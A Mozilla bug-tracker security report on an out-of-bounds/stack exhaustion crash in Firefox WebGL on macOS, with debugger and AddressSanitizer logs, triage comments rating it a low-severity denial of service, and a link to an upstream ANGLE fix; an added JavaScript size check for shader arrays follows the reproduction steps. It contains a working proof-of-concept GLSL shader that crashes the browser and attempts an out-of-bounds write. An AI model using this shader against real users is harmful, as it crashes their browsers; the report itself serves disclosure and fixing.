OOB Access in Firefox WebGL
Categories: Core :: Graphics: CanvasWebGL, defect
People: Reporter: d4ni31, Assigned: ErichDonGubler
Details: Keywords: csectype-dos, reporter-external, sec-low; Whiteboard: [disclosure deadline 2023-10-05]
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Steps to reproduce:
Title
- Mozilla Firefox WebGL SwiftShader OOB Access Vulnerability
Summary
- A Buffer Overflow vulnerability exists in the Firefox WebGL SwiftShader.
- An attacker must open an arbitrary generated HTML file to exploit this vulnerability.
- This vulnerability only works on macOS.
Test environment
- OS : macOS Ventura 13.4.1(22F82), macOS M1
- Product : Mozilla Firefox 115
Log
(lldb) c
Process 10763 resuming
Process 10763 stopped
* thread #25, name = 'CanvasRenderer', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x1715d7ff8)
frame #0: 0x00000001966c2de0 libsystem_pthread.dylib`___chkstk_darwin + 60
libsystem_pthread.dylib`:
-> 0x1966c2de0 <+60>: ldur x11, [x11, #-0x8]
0x1966c2de4 <+64>: mov x10, sp
0x1966c2de8 <+68>: cmp x9, #0x1, lsl #12 ; =0x1000
0x1966c2dec <+72>: b.lo 0x1966c2e04 ; <+96>
Target 0: (firefox) stopped.
(lldb) bt
* thread #25, name = 'CanvasRenderer', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x1715d7ff8)
* frame #0: 0x00000001966c2de0 libsystem_pthread.dylib`___chkstk_darwin + 60
frame #1: 0x00000001fb39d0ec libGLProgrammability.dylib`phase2ProcessLValue + 460
frame #2: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #3: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #4: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #5: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #6: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #7: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #8: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #9: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #10: 0x00000001fb39c53c libGLProgrammability.dylib`phase2AddDef + 228
frame #11: 0x00000001fb39cc98 libGLProgrammability.dylib`phase2ProcessRawCall + 320
frame #12: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #13: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #14: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #15: 0x00000001fb39c53c libGLProgrammability.dylib`phase2AddDef + 228
frame #16: 0x00000001fb321160 libGLProgrammability.dylib`glpASTMergePhase2 + 448
frame #17: 0x00000001fb34cc0c libGLProgrammability.dylib`glpLinkProgram + 276
frame #18: 0x00000001fb369140 libGLProgrammability.dylib`ShLink + 208
frame #19: 0x00000001fb51dac8 GLEngine`gleLinkProgram + 1228
frame #20: 0x00000001fb48bbcc GLEngine`glLinkProgramARB_Exec + 256
frame #21: 0x00000001fb48dd90 GLEngine`glLinkProgramARB_UnpackThread + 20
frame #22: 0x00000001fb4f5bfc GLEngine`gleCmdProcessor + 116
frame #23: 0x0000000196518400 libdispatch.dylib`_dispatch_client_callout + 20
frame #24: 0x000000019652797c libdispatch.dylib`_dispatch_lane_barrier_sync_invoke_and_complete + 56
frame #25: 0x00000001fb48df90 GLEngine`glGetProgramiv_ExecThread + 48
frame #26: 0x0000000114814cdc XUL`___lldb_unnamed_symbol164750 + 68
frame #27: 0x00000001153f8664 XUL`___lldb_unnamed_symbol213525 + 124
frame #28: 0x0000000111f3a760 XUL`___lldb_unnamed_symbol64847 + 596
frame #29: 0x00000001153e5d9c XUL`___lldb_unnamed_symbol213275 + 96
frame #30: 0x00000001153c9990 XUL`___lldb_unnamed_symbol212788 + 80
frame #31: 0x00000001154028d4 XUL`___lldb_unnamed_symbol213735 + 72
frame #32: 0x0000000111f3ee28 XUL`___lldb_unnamed_symbol64859 + 3148
frame #33: 0x000000011541e0d4 XUL`___lldb_unnamed_symbol214107 + 776
frame #34: 0x0000000114919000 XUL`___lldb_unnamed_symbol171852 + 308
frame #35: 0x000000011189b0a0 XUL`___lldb_unnamed_symbol50439 + 772
frame #36: 0x000000011189c2a4 XUL`___lldb_unnamed_symbol50447 + 168
frame #37: 0x00000001115a2ae4 XUL`___lldb_unnamed_symbol42631 + 1752
frame #38: 0x000000011189ec6c XUL`___lldb_unnamed_symbol50477 + 444
frame #39: 0x0000000111865fec XUL`___lldb_unnamed_symbol49845 + 80
frame #40: 0x000000011159fad4 XUL`___lldb_unnamed_symbol42601 + 304
frame #41: 0x0000000100d6b8d8 libnss3.dylib`___lldb_unnamed_symbol2273 + 260
frame #42: 0x00000001966c7fa8 libsystem_pthread.dylib`_pthread_start + 148
(lldb) reg read
General Purpose Registers:
x0 = 0x0000000007ffffff
x1 = 0x0000000000000000
x2 = 0x0000000000000000
x3 = 0x00000001fb31f948 libGLProgrammability.dylib`applevec4TypeSize
x4 = 0x00000002e81a0080
x5 = 0x0000000000000000
x6 = 0x0000000000000000
x7 = 0x0000000000000000
x8 = 0x0000000020000000
x9 = 0x000000001ffffffc
x10 = 0x00000001519d9144
x11 = 0x00000001715d8000
x12 = 0x0000000000000030
x13 = 0x0000000163f74040
x14 = 0x00007ad399f9ae14
x15 = 0xffffffffffffff00
x16 = 0x00000001966c2da4 libsystem_pthread.dylib`___chkstk_darwin
x17 = 0x00000001fb35c54c libGLProgrammability.dylib`glpPrimitiveVectorGetElementType + 52
x18 = 0x0000000000000000
x19 = 0x000000014b9c87d0
x20 = 0x00000001719d9980
x21 = 0x000000014b9c8850
x22 = 0x000000014b9c88f0
x23 = 0x00000001719d9140
x24 = 0x0000000000000011
x25 = 0x0000000000000001
x26 = 0x0000000000000000
x27 = 0x000000014b359fa0
x28 = 0x0000000000000000
fp = 0x00000001719d91c0
lr = 0x00000001fb39d0ec libGLProgrammability.dylib`phase2ProcessLValue + 460
sp = 0x00000001719d9140
pc = 0x00000001966c2de0 libsystem_pthread.dylib`___chkstk_darwin + 60
cpsr = 0x80001000
(lldb)
Reproduce
- For simplification, visit https://www.shadertoy.com/new
- Copy this shader
uvec4 magic[0x7ffffff];   // very large static array; linking this shader is what crashes inside the GL driver (see Log above)
uniform float q;
int weird(int a, int b) {
    return int(mod(float(a), float(b)));   // integer modulo computed through float mod()
}
ivec3 oobIndex(int off) {
    // split a byte offset into array-element / component / sub-component indices (only .x is used below)
    int arrayIndex = off / 0x40;
    int vec4Index = weird(off, 0x40);
    int compIndex = vec4Index / 0x10;
    int combineIndex = weird(vec4Index, 0x10) / 8;
    return ivec3(arrayIndex, compIndex, combineIndex);
}
uint oobRead(int off) {
    ivec3 idx = oobIndex(off);
    uvec4 comp = magic[idx.x];
    return comp.x;
}
uint oobWrite(int off, uint value) {
    ivec3 idx = oobIndex(off);
    if (q != 1233112.0) {   // store depends on a uniform, so it cannot be resolved at compile time
        magic[idx.x] = uvec4(value);
    }
    return magic[idx.x].x;
}
void mainImage( out vec4 fragColor, in vec2 fragCoord )
{
    //uint v = oobRead(0x13371337);
    uint v = oobWrite(0x13371337, uint(0x41414141));
    fragColor = vec4(float(v), 0., 0. ,1.);
}
- Click run
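The shader in the report declares uvec4 magic[0x7ffffff], about 2 GiB of static storage (0x7ffffff elements of 16 bytes), and the backtrace shows the crash inside the driver's link phase while processing it. As an added example (not code from the report, Firefox or ANGLE), the JavaScript below is a pre-link gate that a WebGL front end could apply to reject statically declared arrays above a size cap before the source reaches the platform driver; the cap, the 4-byte scalar size and the type table are assumptions for illustration.

```javascript
// Added example, not from the bug report, Firefox or ANGLE: a size gate for
// statically sized GLSL array declarations, applied before a shader is linked.
// The limit and the per-type sizes below are assumptions for illustration.

const SCALAR_BYTES = 4;                    // float/int/uint/bool treated as 4 bytes (assumption)
const MAX_ARRAY_BYTES = 16 * 1024 * 1024;  // illustrative cap of 16 MiB per array (assumption)

// Component counts for the GLSL basic types this scanner recognises.
const TYPE_COMPONENTS = {
  float: 1, int: 1, uint: 1, bool: 1,
  vec2: 2, vec3: 3, vec4: 4,
  ivec2: 2, ivec3: 3, ivec4: 4,
  uvec2: 2, uvec3: 3, uvec4: 4,
  bvec2: 2, bvec3: 3, bvec4: 4,
  mat2: 4, mat3: 9, mat4: 16,
};

// Remove block and line comments so commented-out declarations are not counted.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, " ").replace(/\/\/[^\n]*/g, " ");
}

// Parse a GLSL integer literal: decimal, 0x hex or leading-zero octal, optional u suffix.
function parseGlslInt(lit) {
  const s = lit.replace(/[uU]$/, "");
  if (/^0[xX][0-9a-fA-F]+$/.test(s)) return parseInt(s, 16);
  if (/^0[0-7]+$/.test(s)) return parseInt(s, 8);
  return parseInt(s, 10);
}

// Find every `type name[literal]` declaration and return those whose static
// storage (elements * components * scalar size) exceeds maxBytes.
function findOversizedArrays(src, maxBytes = MAX_ARRAY_BYTES) {
  const re = /\b([A-Za-z_]\w*)\s+([A-Za-z_]\w*)\s*\[\s*(0[xX][0-9a-fA-F]+|\d+)[uU]?\s*\]/g;
  const oversized = [];
  for (const m of stripComments(src).matchAll(re)) {
    const [, type, name, sizeLit] = m;
    const comps = TYPE_COMPONENTS[type];
    if (comps === undefined) continue;   // struct, sampler or unknown type: not sized here
    const elements = parseGlslInt(sizeLit);
    const bytes = elements * comps * SCALAR_BYTES;
    if (bytes > maxBytes) oversized.push({ name, type, elements, bytes });
  }
  return oversized;
}

// Gate decision: true when no declared array exceeds the cap.
function shaderPassesArrayGate(src) {
  return findOversizedArrays(src).length === 0;
}

// Constructed inputs: the array declaration from the report's shader, and a modest one.
const POC_DECL = "uvec4 magic[0x7ffffff];\nuniform float q;";
const SANE_DECL = "vec4 palette[256];\nuniform float q;";

console.log(shaderPassesArrayGate(POC_DECL), shaderPassesArrayGate(SANE_DECL)); // → false true
```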
Comment 1 (Reporter) • 2 years ago
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-10-05.
Comment 2 (Reporter) • 2 years ago
Address Sanitizer
AddressSanitizer:DEADLYSIGNAL
=================================================================
==11982==ERROR: AddressSanitizer: BUS on unknown address (pc 0x0001966c2de0 bp 0x000172a03a30 sp 0x000172a039b0 T31)
==11982==The signal is caused by a READ memory access.
==11982==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
#0 0x1966c2de0 in ___chkstk_darwin+0x3c (libsystem_pthread.dylib:arm64+0x1de0) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#1 0x554d8001fb39c664 (<unknown module>)
#2 0xde058001fb39c664 (<unknown module>)
#3 0xb8158001fb39c664 (<unknown module>)
#4 0xcb430001fb39c664 (<unknown module>)
#5 0x21390001fb39c664 (<unknown module>)
#6 0xe05f8001fb39c664 (<unknown module>)
#7 0x8f448001fb39c664 (<unknown module>)
#8 0x9c598001fb39c664 (<unknown module>)
#9 0xc2340001fb39c538 (<unknown module>)
#10 0xb90d8001fb39cc94 (<unknown module>)
#11 0x68620001fb39c664 (<unknown module>)
#12 0x42500001fb39c664 (<unknown module>)
#13 0x54598001fb39c664 (<unknown module>)
#14 0x94640001fb39c538 (<unknown module>)
#15 0x8c128001fb32115c (<unknown module>)
#16 0xca5a8001fb34cc08 (<unknown module>)
#17 0x5a378001fb36913c (<unknown module>)
#18 0x6c488001fb51dac4 (<unknown module>)
#19 0x224c8001fb48bbc8 (<unknown module>)
#20 0x3e478001fb48dd8c (<unknown module>)
#21 0xc1670001fb4f5bf8 (<unknown module>)
#22 0x97318001006a61e8 (<unknown module>)
#23 0x1965183fc in _dispatch_client_callout+0x10 (libdispatch.dylib:arm64+0x43fc) (BuildId: c2fd3094b46539a4b77416583ff53c4b32000000200000000100000000040d00)
#24 0xab6e000196527978 (<unknown module>)
#25 0x542f8001006a646c (<unknown module>)
#26 0x1fb48df8c in glGetProgramiv_ExecThread+0x2c (GLEngine:arm64+0x7cf8c) (BuildId: 07f4fb2fb29a3ae29179e379a4ac0d1a32000000200000000100000000040d00)
#27 0x17e8001299816f8 (<unknown module>)
#28 0x12992c604 in mozilla::WebGLProgram::LinkProgram()+0x900 (XUL:arm64+0x6138604) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#29 0x12992b898 in mozilla::WebGLContext::LinkProgram(mozilla::WebGLProgram&)+0x134 (XUL:arm64+0x6137898) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#30 0x12999f3f8 in auto bool mozilla::MethodDispatcher<mozilla::WebGLMethodDispatcher, 49ul, void (mozilla::HostWebGLContext::*)(unsigned long long) const, &mozilla::HostWebGLContext::LinkProgram(unsigned long long) const>::DispatchCommand<mozilla::HostWebGLContext>(mozilla::HostWebGLContext&, unsigned long, mozilla::webgl::RangeConsumerView&)::'lambda'(auto&...)::operator()<unsigned long long>(auto&...) const+0x310 (XUL:arm64+0x61ab3f8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#31 0x12996e3f0 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&&, unsigned long long)+0x3570 (XUL:arm64+0x617a3f0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#32 0x129a78eb8 in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&)+0x808 (XUL:arm64+0x6284eb8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#33 0x126930b54 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&)+0x3a0 (XUL:arm64+0x313cb54) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#34 0x125887ac8 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&)+0x14c (XUL:arm64+0x2093ac8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#35 0x125885010 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr<IPC::Message, mozilla::DefaultDelete<IPC::Message>>)+0x41c (XUL:arm64+0x2091010) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#36 0x125885db4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&)+0x2b4 (XUL:arm64+0x2091db4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#37 0x1258867ec in mozilla::ipc::MessageChannel::MessageTask::Run()+0x14c (XUL:arm64+0x20927ec) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#38 0x1244362a8 in nsThread::ProcessNextEvent(bool, bool*)+0x14ac (XUL:arm64+0xc422a8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#39 0x124442018 in NS_ProcessNextEvent(nsIThread*, bool)+0x114 (XUL:arm64+0xc4e018) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#40 0x125890de0 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*)+0x264 (XUL:arm64+0x209cde0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#41 0x1257908bc in MessageLoop::Run()+0x1c4 (XUL:arm64+0x1f9c8bc) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#42 0x12442dd3c in nsThread::ThreadFunc(void*)+0x264 (XUL:arm64+0xc39d3c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#43 0x1034ad848 in _pt_root+0x388 (libnss3.dylib:arm64+0x391848) (BuildId: 4c4c44b855553144a11cbfa502b717f632000000200000000100000000000b00)
#44 0x1966c7fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#45 0x68608001966c2d9c (<unknown module>)
==11982==Register values:
x[0] = 0x0000000007ffffff x[1] = 0x0000000000000000 x[2] = 0x0000000000000000 x[3] = 0x00000001fb31f948
x[4] = 0x0000000301a30080 x[5] = 0x0000000000000000 x[6] = 0x0000000172988000 x[7] = 0x0000000000000001
x[8] = 0x0000000020000000 x[9] = 0x000000001ffffffc x[10] = 0x0000000152a039b4 x[11] = 0x0000000172988000
x[12] = 0x0000007060565ff8 x[13] = 0x000000000003fffe x[14] = 0x000000000003fff8 x[15] = 0x00007fffffffffff
x[16] = 0x00000001966c2da4 x[17] = 0x00000001fb35c54c x[18] = 0x0000000000000000 x[19] = 0x000000011bfdc7d0
x[20] = 0x0000000172a041f0 x[21] = 0x000000011bfdc850 x[22] = 0x000000011bfdc8f0 x[23] = 0x0000000172a039b0
x[24] = 0x0000000000000011 x[25] = 0x0000000000000001 x[26] = 0x0000000000000000 x[27] = 0x0000613000634bb0
x[28] = 0x0000000000000000 fp = 0x0000000172a03a30 lr = 0x00000001fb39d0ec sp = 0x0000000172a039b0
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: BUS (libsystem_pthread.dylib:arm64+0x1de0) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00) in ___chkstk_darwin+0x3c
Thread T31 created by T0 here:
#0 0x1006a0a18 in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x48a18) (BuildId: 4c4c44f255553144a133620af41d8f6c32000000200000000100000000000b00)
#1 0x10349da7c in _PR_CreateThread+0x44c (libnss3.dylib:arm64+0x381a7c) (BuildId: 4c4c44b855553144a11cbfa502b717f632000000200000000100000000000b00)
#2 0x124430768 in nsThread::Init(nsTSubstring<char> const&)+0x174 (XUL:arm64+0xc3c768) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#3 0x12443ff80 in nsThreadManager::NewNamedThread(nsTSubstring<char> const&, nsIThreadManager::ThreadCreationOptions, nsIThread**)+0x368 (XUL:arm64+0xc4bf80) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#4 0x12444d064 in NS_NewNamedThread(nsTSubstring<char> const&, nsIThread**, already_AddRefed<nsIRunnable>, nsIThreadManager::ThreadCreationOptions)+0x134 (XUL:arm64+0xc59064) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#5 0x1268fbfe4 in mozilla::gfx::CanvasRenderThread::Start()+0x1c0 (XUL:arm64+0x3107fe4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#6 0x1267608ac in gfxPlatform::InitLayersIPC()+0x80 (XUL:arm64+0x2f6c8ac) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#7 0x12675b450 in gfxPlatform::Init()+0x19a8 (XUL:arm64+0x2f67450) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#8 0x12675995c in gfxPlatform::GetPlatform()+0x2c (XUL:arm64+0x2f6595c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#9 0x12cf404f4 in mozilla::widget::GfxInfoBase::GetContentBackend(nsTSubstring<char16_t>&)+0xac (XUL:arm64+0x974c4f4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#10 0x124489e7c in _NS_InvokeByIndex+0x5c (XUL:arm64+0xc95e7c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#11 0x125b75240 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode)+0x2af0 (XUL:arm64+0x2381240) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#12 0x125b7ae58 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*)+0x54c (XUL:arm64+0x2386e58) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#13 0x130c78f34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason)+0x8a4 (XUL:arm64+0xd484f34) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#14 0x130c7aa20 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason)+0x1dc (XUL:arm64+0xd486a20) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#15 0x130c7c4d0 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>)+0x254 (XUL:arm64+0xd4884d0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#16 0x1310096a8 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyKey>, JS::MutableHandle<JS::Value>)+0x12a0 (XUL:arm64+0xd8156a8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#17 0x130c92ed4 in js::Interpret(JSContext*, js::RunState&)+0x11ee4 (XUL:arm64+0xd49eed4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#18 0x130c77e08 in js::RunScript(JSContext*, js::RunState&)+0x494 (XUL:arm64+0xd483e08) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#19 0x130c79040 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason)+0x9b0 (XUL:arm64+0xd485040) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#20 0x130c7aa20 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason)+0x1dc (XUL:arm64+0xd486a20) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#21 0x130c7c4d0 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>)+0x254 (XUL:arm64+0xd4884d0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#22 0x1310096a8 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyKey>, JS::MutableHandle<JS::Value>)+0x12a0 (XUL:arm64+0xd8156a8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#23 0x130cac934 in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>)+0x82c (XUL:arm64+0xd4b8934) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#24 0x130c8a244 in js::Interpret(JSContext*, js::RunState&)+0x9254 (XUL:arm64+0xd496244) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#25 0x130c77e08 in js::RunScript(JSContext*, js::RunState&)+0x494 (XUL:arm64+0xd483e08) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#26 0x130c79040 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason)+0x9b0 (XUL:arm64+0xd485040) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#27 0x130c7aa20 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason)+0x1dc (XUL:arm64+0xd486a20) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#28 0x130e190c4 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>)+0x480 (XUL:arm64+0xd6250c4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#29 0x125b65b24 in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*)+0x1228 (XUL:arm64+0x2371b24) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#30 0x12448b960 in PrepareAndDispatch+0x970 (XUL:arm64+0xc97960) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#31 0x124489ecc in SharedStub+0x3c (XUL:arm64+0xc95ecc) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#32 0x1243d4ab0 in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*)+0x9b4 (XUL:arm64+0xbe0ab0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#33 0x130a83f1c in nsXREDirProvider::DoStartup()+0x4a8 (XUL:arm64+0xd28ff1c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#34 0x130a670a4 in XREMain::XRE_mainRun()+0xe84 (XUL:arm64+0xd2730a4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#35 0x130a693b8 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&)+0xb5c (XUL:arm64+0xd2753b8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#36 0x130a6a3ac in XRE_main(int, char**, mozilla::BootstrapConfig const&)+0x168 (XUL:arm64+0xd2763ac) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#37 0x10002918c in main+0x700 (firefox:arm64+0x10000118c) (BuildId: 4c4c449855553144a1301580c44a7d9332000000200000000100000000000b00)
#38 0x19636ff24 (<unknown module>)
#39 0x4a4dfffffffffffc (<unknown module>)
==11982==ABORTING
Exiting due to channel error.
Comment 3 (Reporter) • 2 years ago
Comment 4 • 2 years ago
The patch is apparently https://chromium.googlesource.com/angle/angle/+/fe45418c6592ab210ba5a6101f5058fe24eed266%5E%21/#F0
Can confirm a nearly instant crash on Mac that looks like the stack in comment 0
bp-94f79790-6426-4621-b709-e36840230707
Comment 5 • 2 years ago
The bug has a release status flag that shows some version of Firefox is affected, thus it will be considered confirmed.
Comment 6 • 2 years ago
[Tracking Requested - why for this release]: This is a sec-high bug with a public test case (in the Chromium bug tracker) so it would be better to get this fixed sooner rather than later.
Comment 7 • 2 years ago
This is the same as bug 1773874, where we are protected by ___chkstk_darwin, thus sec-low, csectype-dos.
It does look like the patch linked in comment 4 is likely to be something we can cherry-pick as a fix though!
Comment 8 • 1 year ago
Sorry for the burst of bugspam: filter on tinkling-glitter-filtrate
Adding reporter-external keyword to security bugs found by non-employees for accounting reasons